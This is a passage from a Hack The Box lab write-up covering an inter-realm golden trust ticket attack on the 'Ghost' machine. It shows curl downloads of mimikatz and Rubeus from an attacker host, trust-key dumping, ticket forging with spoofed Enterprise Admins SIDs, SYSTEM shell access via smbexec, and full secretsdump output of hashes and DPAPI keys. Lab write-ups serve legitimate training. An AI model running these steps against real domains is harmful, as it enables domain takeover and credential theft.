Inter-Realm Golden “Trust” Ticket
The bidirectional trust between GHOST.HTB and CORP.GHOST.HTB domains poses an interesting opportunity for adversaries. Provided that there is a trust account with the INTERDOMAIN_TRUST_ACCOUNT attribute, it is entirely possible to forge an Inter-Realm Golden “trust” ticket
PS C:\tmp> curl http://10.10.14.61/mimikatz.exe -o C:\tmp\mimikatz.exe
PS C:\tmp> curl http://10.10.14.61/Rubeus.exe -o C:\tmp\Rubeus.exeI will be using mimikatz and Rubeus for this since primary.corp.ghost.htb is an internal virtual host that is not directly reachable
PS C:\tmp> ./mimikatz.exe "lsadump::trust /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # lsadump::trust /patch
Current domain: CORP.GHOST.HTB (GHOST-CORP / S-1-5-21-2034262909-2733679486-179904498)
Domain: GHOST.HTB (GHOST / S-1-5-21-4084500788-938703357-3654145966)
[ In ] CORP.GHOST.HTB -> GHOST.HTB
* 6/18/2024 8:55:05 AM - CLEAR - 87 d6 a8 80 98 3b d7 0b aa 5e 69 24 3a 99 90 bc f8 d0 2d 64 b1 a6 f8 a6 5a 2a ff 42 bc f0 47 c4 11 3c 57 ea af 61 36 46 5e f1 9b 05 98 74 85 c9 c5 15 2c d4 f7 08 8e 10 59 85 fa 8e 48 34 d6 3b b8 4c 69 ee e1 09 0c a1 29 d4 66 a6 d0 2d cc c9 8c 08 6c 6b 50 14 ab 63 ba 13 87 04 31 7b d3 ac 65 01 5f 10 b1 09 82 f4 29 bb 5c 33 df 6e d1 db a3 06 03 9f 37 22 60 90 75 5e dd d1 2c 99 e6 ed 2e c9 89 75 16 d8 19 f9 e1 d2 15 6c dd 7e fd 94 fe 86 77 d8 1b 2f 91 c6 2f 51 03 d6 d1 da e6 fb 79 a4 53 00 2b c2 7a 93 6f 79 cd e5 83 a6 c2 d8 ca 85 be 7f 08 8b 7b 33 75 cb 48 39 cc 5c ae de e3 46 42 a0 0f d8 35 12 92 c2 15 1d 92 1e 03 63 32 8b 29 78 c3 03 a1 3b 20 c8 c9 94 38 b1 3a 31 9a dd 48 7c 52 30 7a 81 d1 75 0f 9f 30 d7 94 04
* aes256_hmac 00e2c7b1958d93502a7307cdd218bea9f783fef8d22690a50642dea7b4f69f17
* aes128_hmac 734cb9dfdeb5c942a51f689057ea32bd
* rc4_hmac_nt dae1ad83e2af14a379017f244a2f5297
[ Out ] GHOST.HTB -> CORP.GHOST.HTB
* 6/17/2024 9:51:19 AM - CLEAR - 35 40 61 63 fc 2d 24 ab 5b 37 68 af 85 0c 97 56 75 04 29 15 25 d5 01 6a 22 a6 de dc c4 85 09 9c ab a1 64 6e 5a 0e 5f 4e 18 38 06 2f fe d5 6b 9c 52 b7 81 2d 51 16 66 0c a4 fa fb 0b 25 92 e8 79 0f a6 cf e2 65 1f 36 eb 1d ee 6c 8e b0 9b d5 a2 e3 8a 40 22 c4 f9 95 0c 94 b1 c8 36 27 4d 17 56 3d 9b 3c 08 46 bb 4b 21 fd 6e 62 93 1a 48 5a e9 6e c8 94 29 e4 77 4b ec cb e6 e8 70 d9 43 4d 80 d0 54 d2 55 7e 8d 5c 76 0c bd f3 2b 28 70 82 ba 30 a7 40 45 cc 16 52 62 7d 8b 80 71 3d a5 a7 c0 0c a2 f8 ea 85 11 96 cc a6 0a 71 a9 c3 3f de c9 d3 75 c3 1e 0b a9 72 45 3e b7 cb ff 71 38 2e 0c 19 fc 3d ca 02 7b c1 e2 7f c5 b4 49 30 07 c1 8c 60 0f f7 4b aa 87 05 d1 63 a8 9d 10 d7 f8 60 1c a9 4a 56 b2 b0 d2 ad 4f bf 00 c5 36 48 77 18 ec
* aes256_hmac 2a6246855d7048ad3f39be69a216742c193afa3d841f46c4a269ba8468f3b163
* aes128_hmac a98256f08f9da89d7880ab72ff57ecfb
* rc4_hmac_nt ba8ef93f824c0f3b1e98037ae08ab68c
[ In-1] CORP.GHOST.HTB -> GHOST.HTB
* 1/31/2024 7:33:33 PM - CLEAR - f7 22 98 11 0b 7d f8 1b f7 47 2d 55 f9 90 7b 0f 55 70 d7 f8 d0 29 75 0c 5a 1d 74 11 ae a4 bf 03 db 7d 3f f3 b8 43 53 b0 0c b0 1f 24 6e b5 4b b8 ad 16 40 8d 31 44 da 6e 1e 8a a2 d2 c0 d5 6f fa 8d 06 89 7a 81 5d 7e 73 48 78 4b d2 8e ef b0 27 63 0b dc 92 c3 a1 26 72 37 b1 29 ef 9e 5c 55 69 4c 3a 34 bf 12 37 66 b0 e2 54 94 53 30 c7 bb 19 35 f2 03 86 df 96 b4 8a 5e 05 be 40 5f 25 31 d4 71 0a 9e 30 f0 8b 34 3f c4 26 ee a1 4f c5 a5 f5 aa ae 70 17 b2 f1 35 1b 3f 72 c8 e8 59 cc b4 a8 d3 b0 8f 8b 3c 8c fb 02 f0 b1 47 95 c2 41 7b 77 b5 0c 1a ea 4d ac 5d ff dc 09 71 40 ac e0 59 b2 6f 54 12 ce 35 a7 a2 c2 5f 9c 48 63 77 75 96 00 98 ac d5 e9 5a 1c b4 38 66 37 6c a9 af 2a ae d6 41 db 87 5e 7e 30 09 8f 9c 94 11 48 9a 3a e8 88 8a 9c d3 66 ec bc b8 89 64 f8 f5 aa 63 ce 50 7a
* aes256_hmac 65f29f0fb742745cbfea8e3170c992804aca7c5f9aab5db75f1aa00a814d8639
* aes128_hmac 5e5155ac760ced16b39e220802c20b97
* rc4_hmac_nt 2636885e5b7ee03e66fac8a567a14cb8
[Out-1] GHOST.HTB -> CORP.GHOST.HTB
* 6/17/2024 9:51:19 AM - CLEAR - f7 22 98 11 0b 7d f8 1b f7 47 2d 55 f9 90 7b 0f 55 70 d7 f8 d0 29 75 0c 5a 1d 74 11 ae a4 bf 03 db 7d 3f f3 b8 43 53 b0 0c b0 1f 24 6e b5 4b b8 ad 16 40 8d 31 44 da 6e 1e 8a a2 d2 c0 d5 6f fa 8d 06 89 7a 81 5d 7e 73 48 78 4b d2 8e ef b0 27 63 0b dc 92 c3 a1 26 72 37 b1 29 ef 9e 5c 55 69 4c 3a 34 bf 12 37 66 b0 e2 54 94 53 30 c7 bb 19 35 f2 03 86 df 96 b4 8a 5e 05 be 40 5f 25 31 d4 71 0a 9e 30 f0 8b 34 3f c4 26 ee a1 4f c5 a5 f5 aa ae 70 17 b2 f1 35 1b 3f 72 c8 e8 59 cc b4 a8 d3 b0 8f 8b 3c 8c fb 02 f0 b1 47 95 c2 41 7b 77 b5 0c 1a ea 4d ac 5d ff dc 09 71 40 ac e0 59 b2 6f 54 12 ce 35 a7 a2 c2 5f 9c 48 63 77 75 96 00 98 ac d5 e9 5a 1c b4 38 66 37 6c a9 af 2a ae d6 41 db 87 5e 7e 30 09 8f 9c 94 11 48 9a 3a e8 88 8a 9c d3 66 ec bc b8 89 64 f8 f5 aa 63 ce 50 7a
* aes256_hmac 37c5b6a6076f891a369416f6de05980b74af0bb903da6a9f7116084ace834317
* aes128_hmac abbd5eb343e1af08b7e813a4cbcf3617
* rc4_hmac_nt 2636885e5b7ee03e66fac8a567a14cb8
mimikatz(commandline) # exit
Bye!First, I need to obtain a trusted key, which essentially is the NTLM hash for the trust account is dae1ad83e2af14a379017f244a2f5297, which belongs to the GHOST$ account
It’s the first In; [ In ] CORP.GHOST.HTB -> GHOST.HTB
mimikatz # kerberos::golden /user:GHOST$ /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-1103 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User : GHOST$
Domain : CORP.GHOST.HTB (CORP)
SID : S-1-5-21-2034262909-2733679486-179904498-1103
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt
Service : krbtgt
Target : GHOST.HTB
Lifetime : 7/17/2024 4:40:14 AM ; 7/15/2034 4:40:14 AM ; 7/15/2034 4:40:14 AM
-> Ticket : golden_trust.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !I will be using mimikatz to forge a golden “trust” ticket
/user:GHOST$: User to impersonate/domain:CORP.GHOST.HTB: Current Domain/sid:S-1-5-21-2034262909-2733679486-179904498-1103: SID of Trust Account- Trust account is
GHOST$
- Trust account is
/sids:S-1-5-21-4084500788-938703357-3654145966-519: for the SIDHistory spoofing- set to
Enterprise Admins@GHOST.HTB
- set to
/rc4:dae1ad83e2af14a379017f244a2f5297: RC4 key of the Trust Account- Trust account is
GHOST$
- Trust account is
/service:krbtgt: service name;krbtgt/target:GHOST.HTB: Target domain/ticket:golden_trust.kirbi: Save the ticket to a file
Requesting a Service Ticket
PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/dc01.ghost.htb /dc:dc01.ghost.htb /ptt /nowrap /outfile:C:\tmp\golden_trusted.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*] Using domain controller: DC01.ghost.htb (10.0.0.254)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
doIE1DCCBNCgAwIBBaEDAgEWooID3DCCA9hhggPUMIID0KADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDlzCCA5OgAwIBEqEDAgEEooIDhQSCA4Gf6WTGMgLqQ9CoXr0TdkGi436NMoBKg5R+7fRk3+7jYJtgDTh5X3rBMWzH/KP+CFL8bxnITdxgCpL4uBw4coil2TyKpLaDcRNetTwGCNvd+J4OUBsAUq/1R8nsyVFCfJaRW6QhIimYNkNMPzm6vDJqqucUUODXzsp+aPWs0S0qZCOmIuRw9IBMvclM8eVHC+IYID1V9V5ht6Y9EdjQZYl4Gp3YRjPlXsAm0H8napXjqf8meii0ql8szt6EYGRyBABzPlQJ7SPbe+AabWnKxbAElAUt/CX6aDljjYdru89QnK+luT/nk2fIsdwHGS31zZStGyFtaQwYspmiznPiLmVY4e9NE9WRrxXIkRk/c9aFHBwMseq4MIlkGePIBa/to2vuJ4zC6983acW6tePEF797wpKuTlsMdXkG/UDPvM2JMTGw1fOOJ4uMG7rNPsCBgve6YIyrVYA4tIJ1ofQU8cLsEaDNyGusIZW25Y05epZCxTPRrWdhrDlVubDpCfF59EbSihm+JlhLDnZmW8nEsJ55yRZa4tH35r45eHfAiTwvhmcNEQ9SRiNzDSKzmWswieL9shwvUZZcRNLk413szgTKtbQX8VPpUnuqyrrOwp6l1c6yNaGs0GJi1mOQPGXR8052VJqHiOfb+UhXOs44eK6mOLssMv07Z4cI9jY7zzqsr+fO3LIpiES0QsbDoehE5cCovPSEQbvd69AnSn8upuBTxX4NsNPhnIVqS6OmsG6z/rqsdtL8CMyzbc3gEZ/r+E4RWZXH7+Pyd7/4dM8zdOZKLPuhIAuSIXaS6w/Qpfce01vgb5VVvw9km6q8mvN8us9Bai8ozxqX1M0yjnwn/uVv18axOjBWTHzo2dFIN8dh8WSSrGKRxilQy2eIi4/mWTC+rRnE3jKKb7UHQ3IHgJt8Yu2JOSaZkdRTZtLbi2OOsMrt9UXVB+gB90ld0QpcHceBRKnsyMardhfTsgWBNDgf9zoB7GgxGBXizrVKx4zdaRPQ7DiT0fWVEQrtPODQslM6wPYZE360uCJI2B+QKxlJru3diCMYFJrXB5TcY1+ZL1FBHtQbuvO/x4dEYw7EjKiBxx72aRlWOUfVnK58NMVScGl/9kncRtIQ6qAEiD3HJNSu9tC+BWgdeyUxTpyaOyA3zZhfhCJJtMamjC59ZM5BPtXQy9eRugOsnYqP3ZUYCoKjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCBA2zGUR8vQczzKvSbv8GbUKwnyvQcC/F9luWvjktIX6aEQGw5DT1JQLkdIT1NULkhUQqITMBGgAwIBAaEKMAgbBkdIT1NUJKMHAwUAQKUAAKURGA8yMDI0MDcxNzExNDAyMVqmERgPMjAyNDA3MTcyMTQwMjFapxEYDzIwMjQwNzI0MTE0MDIxWqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg==
ServiceName : cifs/DC01.ghost.htb
ServiceRealm : GHOST.HTB
UserName : GHOST$
UserRealm : CORP.GHOST.HTB
StartTime : 7/17/2024 4:40:21 AM
EndTime : 7/17/2024 2:40:21 PM
RenewTill : 7/24/2024 4:40:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : QNsxlEfL0HM8yr0m7/Bm1CsJ8r0HAvxfZblr45LSF+k=
[*] Ticket written to C:\tmp\golden_trusted.kirbiNow requesting for a service ticket with Rubeus, using the forged Inter-Realm Golden “trust” ticket
PS C:\tmp> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: Administrator @ CORP.GHOST.HTB
Server: cifs/DC01.ghost.htb @ GHOST.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/16/2024 16:16:53 (local)
End Time: 7/17/2024 2:16:53 (local)
Renew Time: 7/23/2024 16:16:53 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: It’s loaded on to the memory
PS C:\tmp> ls \\dc01.ghost.htb\C$
Directory: \\dc01.ghost.htb\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/2/2024 8:17 PM Program Files
d----- 2/2/2024 8:16 PM Program Files (x86)
d-r--- 2/4/2024 1:48 PM Users
d----- 7/10/2024 3:08 AM Windows Now I am able to access the dc01.ghost.htb host from the primary.corp.ghost.htb host
*Evil-WinRM* PS C:\tmp> download golden_trusted.kirbi
Info: Downloading C:\tmp\golden_trusted.kirbi to golden_trusted.kirbi
Info: Download successful!SAFELY Transferring the service ticket to Kali using the established & tunneled evil-winRM session
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ impacket-ticketConverter golden_trusted.kirbi golden_trusted.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] converting kirbi to ccache...
[+] doneConverting kirbi format to the usable ccache format
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=golden_trusted.ccache impacket-psexec CORP.GHOST.HTB/@dc01.ghost.htb -k -no-pass -dc-ip 10.0.0.254 -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:dc01.ghost.htb[\pipe\svcctl]
[+] Using Kerberos Cache: golden_trusted.ccache
[+] Returning cached credential for CIFS/DC01.GHOST.HTB@GHOST.HTB
[+] Using TGS from cache
[+] Changing sname from cifs/dc01.ghost.htb@GHOST.HTB to CIFS/DC01.GHOST.HTB@CORP.GHOST.HTB and hoping for the best
[+] Username retrieved from CCache: GHOST$
[*] Requesting shares on dc01.ghost.htb.....
[*] Found writable share ADMIN$
[*] Uploading file sjDdtFfj.exe
[*] Opening SVCManager on dc01.ghost.htb.....
[*] Creating service EPTr on dc01.ghost.htb.....
[*] Starting service EPTr.....impacket-psexec just hangs
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=golden_trusted.ccache impacket-smbexec CORP.GHOST.HTB/@dc01.ghost.htb -k -no-pass -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] StringBinding ncacn_np:dc01.ghost.htb[\pipe\svcctl]
[+] Using Kerberos Cache: golden_trusted.ccache
[+] Returning cached credential for CIFS/DC01.GHOST.HTB@GHOST.HTB
[+] Using TGS from cache
[+] Changing sname from cifs/dc01.ghost.htb@GHOST.HTB to CIFS/DC01.GHOST.HTB@CORP.GHOST.HTB and hoping for the best
[+] Username retrieved from CCache: GHOST$
[+] Executing %COMSPEC% /Q /c echo cd ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\UxstjpFX.bat & %COMSPEC% /Q /c %SYSTEMROOT%\UxstjpFX.bat & del %SYSTEMROOT%\UxstjpFX.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
[+] Executing %COMSPEC% /Q /c echo whoami ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\KLbQmiHG.bat & %COMSPEC% /Q /c %SYSTEMROOT%\KLbQmiHG.bat & del %SYSTEMROOT%\KLbQmiHG.bat
nt authority\system
C:\Windows\system32>hostname
[+] Executing %COMSPEC% /Q /c echo hostname ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\cuYlGKyR.bat & %COMSPEC% /Q /c %SYSTEMROOT%\cuYlGKyR.bat & del %SYSTEMROOT%\cuYlGKyR.bat
DC01
C:\Windows\system32>ipconfig
[+] Executing %COMSPEC% /Q /c echo ipconfig ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\opbFTlrX.bat & %COMSPEC% /Q /c %SYSTEMROOT%\opbFTlrX.bat & del %SYSTEMROOT%\opbFTlrX.bat
Windows IP Configuration
Ethernet adapter vEthernet (internal):
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.254
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.24
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2However, impacket-smbexec works! This is because the service ticket was generated for cifs/DC01.ghost.htb, which is the SMB service.
System Level Compromise on the DC01 host
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=golden_trusted.ccache impacket-secretsdump CORP.GHOST.HTB/@dc01.ghost.htb -k -no-pass -debug
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: golden_trusted.ccache
[+] Returning cached credential for CIFS/DC01.GHOST.HTB@GHOST.HTB
[+] Using TGS from cache
[+] Changing sname from cifs/dc01.ghost.htb@GHOST.HTB to CIFS/DC01.GHOST.HTB@CORP.GHOST.HTB and hoping for the best
[+] Username retrieved from CCache: GHOST$
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x3ee624e56316fc8523b59f72d191a0cd
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab8f4de89a9d5461a503ee5a8d6020ef:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[+] Looking into NL$2
[+] Looking into NL$3
[+] Looking into NL$4
[+] Looking into NL$5
[+] Looking into NL$6
[+] Looking into NL$7
[+] Looking into NL$8
[+] Looking into NL$9
[+] Looking into NL$10
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
[+] Could not calculate machine account Kerberos keys, only printing plain password (hex encoded)
GHOST\DC01$:plain_password_hex:3e329a9f2e0072a09e1e04635a6dda1f76cb8660c8bb918c6f9e73f3aafca1646034ca54c0b0d202c756aa5c45f0ac2db8583a8203e02c7083f97f6e0af338a3d4165df84ff4e339a8abf607371a5870c42a8a5b6ecfb80d899b0438eb3aed3b796ad904f723fd381ad9858f6403d4752a36fd16d40d7cdeb2f5eaf13fe565c565b150224d43acbfb16161cfba2e3eed6c408213b62bcb1ef7a4e759e34c2971b21d5f617b036cdc2bb658bd9af580646a2e89dad00d6386fd508e14c23164647813b440966dfd73e9ae6f3eb6c94381978f9757aa8a51ac9a00dfed31facb1f22422e4cca75ba8518ff7882ef94d5a4
GHOST\DC01$:aad3b435b51404eeaad3b435b51404ee:e6c3d61860f92e30e8e9744ac5d9783b:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0x873c8dce6c211764839e23119defe1090cd9c0c0
dpapi_userkey:0xceba98a9e43ef2dd80788854c12b7af873b0b590
[+] Looking into NL$KM
[*] NL$KM
0000 6A BE D2 DA 55 7A 8B 7A 33 C4 07 B2 80 79 27 91 j...Uz.z3....y'.
0010 F1 2B AA 30 EA 46 CC 74 F2 43 97 29 4C 0B AC 03 .+.0.F.t.C.)L...
0020 B5 69 AB 0E 15 3C F6 2E EB AC A5 39 89 EA 58 B0 .i...<.....9..X.
0030 BD 14 14 9A 85 58 60 94 1C 12 4A 97 7F 54 24 33 .....X`...J..T$3
NL$KM:6abed2da557a8b7a33c407b280792791f12baa30ea46cc74f24397294c0bac03b569ab0e153cf62eebaca53989ea58b0bd14149a855860941c124a977f542433
[+] Looking into _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_ee4cab5223967daca72a9fc555816b05afedd0b470e337963aef35e5eb7f13ff
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_ee4cab5223967daca72a9fc555816b05afedd0b470e337963aef35e5eb7f13ff
0000 4C 49 6B 0B 59 75 6E CD B5 FC 98 20 02 10 E3 F1 LIk.Yun.... ....
0010 EE 6C E4 13 25 1F C2 2A 7F 4A 13 A8 54 E8 09 B8 .l..%..*.J..T...
0020 02 D5 24 BA 9E 9B BC B2 38 A9 9A B1 AD BB 56 AA ..$.....8.....V.
0030 5A 17 42 EA 3B 5B 4D BC 9C 40 9B 39 CA 6F DB 4A Z.B.;[M..@.9.o.J
0040 46 08 60 81 FE EA 88 72 2E F2 AC 0F 72 5D 80 C2 F.`....r....r]..
0050 F7 97 58 2C 74 EE 89 DA 73 DE 97 28 3A FD 2A 3E ..X,t...s..(:.*>
0060 1A 3E E2 76 DB 41 15 14 E0 AE 1F 93 F1 60 00 F2 .>.v.A.......`..
0070 67 93 60 EE 5D 3C 88 0F 1A 2D AF 03 F6 1A ED CD g.`.]<...-......
0080 6B 9E 74 4B 34 A9 64 88 B2 7F 2F 4E EB 82 A7 D9 k.tK4.d.../N....
0090 37 EF C0 48 82 64 33 2A 21 B9 04 E4 7D A9 E3 45 7..H.d3*!...}..E
00a0 C9 2F 4D C6 58 DF D4 6E FA F5 A0 86 A0 F8 E0 7C ./M.X..n.......|
00b0 67 8F E2 A5 C3 E9 BB 06 58 AF 23 7E AD C7 05 50 g.......X.#~...P
00c0 F4 4C EC 1A 23 73 19 13 E0 88 8E EA BE 5D 10 D5 .L..#s.......]..
00d0 50 ED 14 93 42 2B 96 91 2B 07 D7 B1 4C 3A B0 75 P...B+..+...L:.u
00e0 7A 8E 49 D4 6D E7 10 65 F7 AC 5D BB F3 4B DA 4E z.I.m..e..]..K.N
_SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_ee4cab5223967daca72a9fc555816b05afedd0b470e337963aef35e5eb7f13ff:4c496b0b59756ecdb5fc98200210e3f1ee6ce413251fc22a7f4a13a854e809b802d524ba9e9bbcb238a99ab1adbb56aa5a1742ea3b5b4dbc9c409b39ca6fdb4a46086081feea88722ef2ac0f725d80c2f797582c74ee89da73de97283afd2a3e1a3ee276db411514e0ae1f93f16000f2679360ee5d3c880f1a2daf03f61aedcd6b9e744b34a96488b27f2f4eeb82a7d937efc0488264332a21b904e47da9e345c92f4dc658dfd46efaf5a086a0f8e07c678fe2a5c3e9bb0658af237eadc70550f44cec1a23731913e0888eeabe5d10d550ed1493422b96912b07d7b14c3ab0757a8e49d46de71065f7ac5dbbf34bda4e
[+] Looking into _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_ee4cab5223967daca72a9fc555816b05afedd0b470e337963aef35e5eb7f13ff
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_ee4cab5223967daca72a9fc555816b05afedd0b470e337963aef35e5eb7f13ff
0000 01 00 00 00 24 02 00 00 10 00 12 01 14 02 1C 02 ....$...........
0010 EC 7A EE 32 68 60 E8 3B 0D 63 75 05 8C 51 22 F7 .z.2h`.;.cu..Q".
0020 E3 47 A0 35 2A A5 68 49 EA E1 D7 96 BE 3A A0 60 .G.5*.hI.....:.`
0030 CF 60 3E 40 3C 71 A0 12 CC 72 DE D4 D4 6F CB BA .`>@<q...r...o..
0040 00 BB 61 79 80 9E EC AA 05 4C 37 39 45 59 41 AB ..ay.....L79EYA.
0050 02 EB 67 F9 24 AF 6F B9 B7 51 9A D3 7B 4B 98 0E ..g.$.o..Q..{K..
0060 7E D2 B8 5C B0 83 B9 32 87 A0 63 D5 60 67 DB FF ~..\...2..c.`g..
0070 4B BC E5 F9 0E A0 C7 FC 39 B9 83 8A 0C C3 DB D9 K.......9.......
0080 6C CE C9 F3 9C A0 ED F6 CB EA 12 1D E0 B1 92 AD l...............
0090 A6 8F 79 C3 3D B6 7E 2A C0 22 F9 5B A6 DD 04 CE ..y.=.~*.".[....
00a0 35 8A E7 25 7A CD 3B 81 97 8E 7A FB 74 4B F0 A3 5..%z.;...z.tK..
00b0 22 4D 9D 52 0E CC 30 AC BE 1C D8 E3 9B D3 3D 5E "M.R..0.......=^
00c0 04 88 7B CB 1F FB AC 4B 7B 57 F9 FC A8 A5 C0 D2 ..{....K{W......
00d0 8A 57 15 01 80 8D BB 82 5A 8C 1E 40 C9 01 6B E3 .W......Z..@..k.
00e0 ED 76 5B 7D 2E C6 5E 5E 30 FE 92 75 51 53 FA 40 .v[}..^^0..uQS.@
00f0 35 CC 27 C6 BC BE D9 14 3F 28 C5 A0 9E 84 76 EF 5.'.....?(....v.
0100 37 7E DD B7 75 EA 8E 74 AB 4F B1 E7 BD 74 18 89 7~..u..t.O...t..
0110 00 00 A0 9C C7 D4 4D 7E 23 2A F8 DC 35 60 80 01 ......M~#*..5`..
0120 86 A6 75 E6 D3 98 95 A2 3D 48 5E 0C 45 DC D7 B0 ..u.....=H^.E...
0130 56 32 E4 1D F6 B4 8B 32 F2 C1 08 2B 8F 2A 80 55 V2.....2...+.*.U
0140 5D 0D 4D 71 32 5B 26 F1 AF 6E DF 90 E7 78 24 1D ].Mq2[&..n...x$.
0150 3B A6 6F 19 04 86 6D F0 A4 F9 C2 03 BC 7C 30 02 ;.o...m......|0.
0160 67 22 B2 8B 95 56 95 31 D5 2B 3A 3A 78 43 FE AF g"...V.1.+::xC..
0170 F7 DB 52 3F 53 C2 9A B9 83 CD 62 5D 80 8A FC 68 ..R?S.....b]...h
0180 4F EE 3C CE F8 28 E4 E1 0E B7 29 B3 CD E6 A5 7F O.<..(....).....
0190 CD B8 09 0E 11 48 4B 57 E7 63 FA CD 90 05 C4 B8 .....HKW.c......
01a0 36 CC 38 D6 54 9A 11 59 8C 40 A9 9F 33 D9 01 A3 6.8.T..Y.@..3...
01b0 58 E7 71 4B 33 2F 07 49 19 6D 5A 17 5B 31 3E 69 X.qK3/.I.mZ.[1>i
01c0 EC 71 5F B7 01 40 9A 05 02 B7 15 8D 54 08 08 27 .q_..@......T..'
01d0 C3 A8 F1 B6 D3 CD E6 E7 61 F6 92 93 30 3D 84 F0 ........a...0=..
01e0 AF E0 70 C9 73 38 78 22 0C 2B 71 6E 84 BE E7 9F ..p.s8x".+qn....
01f0 02 DA 34 C3 B3 C7 EC 7B 5A 6F E0 3B 35 79 C6 20 ..4....{Zo.;5y.
0200 1D 84 49 D2 63 5E 80 89 B4 4E 97 9E 89 62 71 30 ..I.c^...N...bq0
0210 6F D0 00 00 4E A3 BF 98 62 0A 00 00 4E 45 EF E5 o...N...b...NE..
0220 61 0A 00 00 a...
